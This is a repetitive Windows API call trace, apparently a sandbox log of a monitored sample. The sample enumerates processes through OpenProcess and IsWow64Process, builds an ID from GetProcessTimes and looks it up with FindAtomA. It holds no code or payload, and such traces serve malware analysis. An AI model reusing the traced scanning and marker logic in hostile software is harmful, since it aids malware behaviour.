	[0082.276] CloseHandle (hObject=0x3bc) returned 1
	[0082.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3bc
	[0082.276] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.276] CloseHandle (hObject=0x3bc) returned 1
	[0082.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3bc
	[0082.276] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.276] CloseHandle (hObject=0x3bc) returned 1
	[0082.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3bc
	[0082.276] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.276] CloseHandle (hObject=0x3bc) returned 1
	[0082.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3bc
	[0082.276] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.276] CloseHandle (hObject=0x3bc) returned 1
	[0082.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3bc
	[0082.277] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.277] CloseHandle (hObject=0x3bc) returned 1
	[0082.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3bc
	[0082.277] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.277] CloseHandle (hObject=0x3bc) returned 1
	[0082.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3bc
	[0082.277] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.277] CloseHandle (hObject=0x3bc) returned 1
	[0082.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3bc
	[0082.277] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.277] CloseHandle (hObject=0x3bc) returned 1
	[0082.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3bc
	[0082.277] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.277] CloseHandle (hObject=0x3bc) returned 1
	[0082.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3bc
	[0082.277] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.277] CloseHandle (hObject=0x3bc) returned 1
	[0082.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.278] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.278] CloseHandle (hObject=0x3bc) returned 1
	[0082.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.278] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.278] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0082.278] GetProcessTimes (in: hProcess=0x3bc, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0082.278] wsprintfA (in: param_1=0x752448, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0082.278] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.279] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0082.279] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.279] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0082.279] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0082.279] CloseHandle (hObject=0x3bc) returned 1
	[0082.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0082.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0082.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3bc
	[0082.279] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.279] CloseHandle (hObject=0x3bc) returned 1
	[0082.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0082.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0082.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0082.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0082.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0082.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0082.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0082.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0082.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0082.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3c0
	[0082.319] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.319] CloseHandle (hObject=0x3c0) returned 1
	[0082.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0082.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0082.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3c0
	[0082.319] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.319] CloseHandle (hObject=0x3c0) returned 1
	[0082.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0082.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3c0
	[0082.319] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.319] CloseHandle (hObject=0x3c0) returned 1
	[0082.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3c0
	[0082.319] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.319] CloseHandle (hObject=0x3c0) returned 1
	[0082.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3c0
	[0082.320] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.320] CloseHandle (hObject=0x3c0) returned 1
	[0082.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3c0
	[0082.320] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.320] CloseHandle (hObject=0x3c0) returned 1
	[0082.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3c0
	[0082.320] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.320] CloseHandle (hObject=0x3c0) returned 1
	[0082.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3c0
	[0082.320] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.320] CloseHandle (hObject=0x3c0) returned 1
	[0082.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0082.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3c0
	[0082.320] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.320] CloseHandle (hObject=0x3c0) returned 1
	[0082.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3c0
	[0082.320] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.321] CloseHandle (hObject=0x3c0) returned 1
	[0082.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3c0
	[0082.321] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.321] CloseHandle (hObject=0x3c0) returned 1
	[0082.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0082.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3c0
	[0082.321] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.321] CloseHandle (hObject=0x3c0) returned 1
	[0082.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3c0
	[0082.321] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.321] CloseHandle (hObject=0x3c0) returned 1
	[0082.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3c0
	[0082.321] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.321] CloseHandle (hObject=0x3c0) returned 1
	[0082.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3c0
	[0082.321] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.321] CloseHandle (hObject=0x3c0) returned 1
	[0082.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3c0
	[0082.322] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.322] CloseHandle (hObject=0x3c0) returned 1
	[0082.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3c0
	[0082.322] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.322] CloseHandle (hObject=0x3c0) returned 1
	[0082.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3c0
	[0082.322] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.322] CloseHandle (hObject=0x3c0) returned 1
	[0082.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3c0
	[0082.322] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.322] CloseHandle (hObject=0x3c0) returned 1
	[0082.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3c0
	[0082.322] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.322] CloseHandle (hObject=0x3c0) returned 1
	[0082.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3c0
	[0082.322] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.322] CloseHandle (hObject=0x3c0) returned 1
	[0082.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3c0
	[0082.322] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.323] CloseHandle (hObject=0x3c0) returned 1
	[0082.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3c0
	[0082.323] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.323] CloseHandle (hObject=0x3c0) returned 1
	[0082.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3c0
	[0082.323] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.323] CloseHandle (hObject=0x3c0) returned 1
	[0082.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3c0
	[0082.323] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.323] CloseHandle (hObject=0x3c0) returned 1
	[0082.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3c0
	[0082.323] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.323] CloseHandle (hObject=0x3c0) returned 1
	[0082.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3c0
	[0082.323] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.323] CloseHandle (hObject=0x3c0) returned 1
	[0082.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3c0
	[0082.323] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.323] CloseHandle (hObject=0x3c0) returned 1
	[0082.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3c0
	[0082.324] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.324] CloseHandle (hObject=0x3c0) returned 1
	[0082.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3c0
	[0082.324] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.324] CloseHandle (hObject=0x3c0) returned 1
	[0082.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3c0
	[0082.324] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.324] CloseHandle (hObject=0x3c0) returned 1
	[0082.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3c0
	[0082.324] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.324] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0082.324] GetProcessTimes (in: hProcess=0x3c0, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0082.325] wsprintfA (in: param_1=0x7400f0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0082.325] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.325] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0082.325] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.325] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0082.325] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0082.326] CloseHandle (hObject=0x3c0) returned 1
	[0082.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0082.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0082.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3c0
	[0082.326] IsWow64Process (in: hProcess=0x3c0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.326] CloseHandle (hObject=0x3c0) returned 1
	[0082.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0082.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0082.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0082.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0082.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0082.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0082.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0082.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0082.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0082.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0082.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0082.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0082.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0082.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0082.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0082.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0082.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0082.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0082.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3d0
	[0082.525] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.525] CloseHandle (hObject=0x3d0) returned 1
	[0082.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0082.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0082.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3d0
	[0082.526] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.526] CloseHandle (hObject=0x3d0) returned 1
	[0082.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0082.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3d0
	[0082.526] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.526] CloseHandle (hObject=0x3d0) returned 1
	[0082.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3d0
	[0082.526] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.526] CloseHandle (hObject=0x3d0) returned 1
	[0082.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3d0
	[0082.526] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.526] CloseHandle (hObject=0x3d0) returned 1
	[0082.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3d0
	[0082.526] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.526] CloseHandle (hObject=0x3d0) returned 1
	[0082.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3d0
	[0082.527] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.527] CloseHandle (hObject=0x3d0) returned 1
	[0082.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3d0
	[0082.527] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.527] CloseHandle (hObject=0x3d0) returned 1
	[0082.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0082.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3d0
	[0082.527] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.527] CloseHandle (hObject=0x3d0) returned 1
	[0082.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3d0
	[0082.527] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.527] CloseHandle (hObject=0x3d0) returned 1
	[0082.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3d0
	[0082.527] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.527] CloseHandle (hObject=0x3d0) returned 1
	[0082.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0082.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3d0
	[0082.528] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.528] CloseHandle (hObject=0x3d0) returned 1
	[0082.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3d0
	[0082.528] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.528] CloseHandle (hObject=0x3d0) returned 1
	[0082.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3d0
	[0082.528] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.528] CloseHandle (hObject=0x3d0) returned 1
	[0082.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3d0
	[0082.528] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.528] CloseHandle (hObject=0x3d0) returned 1
	[0082.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3d0
	[0082.528] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.528] CloseHandle (hObject=0x3d0) returned 1
	[0082.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3d0
	[0082.528] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.528] CloseHandle (hObject=0x3d0) returned 1
	[0082.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3d0
	[0082.529] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.529] CloseHandle (hObject=0x3d0) returned 1
	[0082.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3d0
	[0082.529] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.529] CloseHandle (hObject=0x3d0) returned 1
	[0082.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3d0
	[0082.529] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.529] CloseHandle (hObject=0x3d0) returned 1
	[0082.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3d0
	[0082.529] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.529] CloseHandle (hObject=0x3d0) returned 1
	[0082.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3d0
	[0082.529] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.529] CloseHandle (hObject=0x3d0) returned 1
	[0082.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3d0
	[0082.529] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.529] CloseHandle (hObject=0x3d0) returned 1
	[0082.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3d0
	[0082.530] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.530] CloseHandle (hObject=0x3d0) returned 1
	[0082.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3d0
	[0082.530] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.530] CloseHandle (hObject=0x3d0) returned 1
	[0082.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3d0
	[0082.530] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.530] CloseHandle (hObject=0x3d0) returned 1
	[0082.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3d0
	[0082.530] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.530] CloseHandle (hObject=0x3d0) returned 1
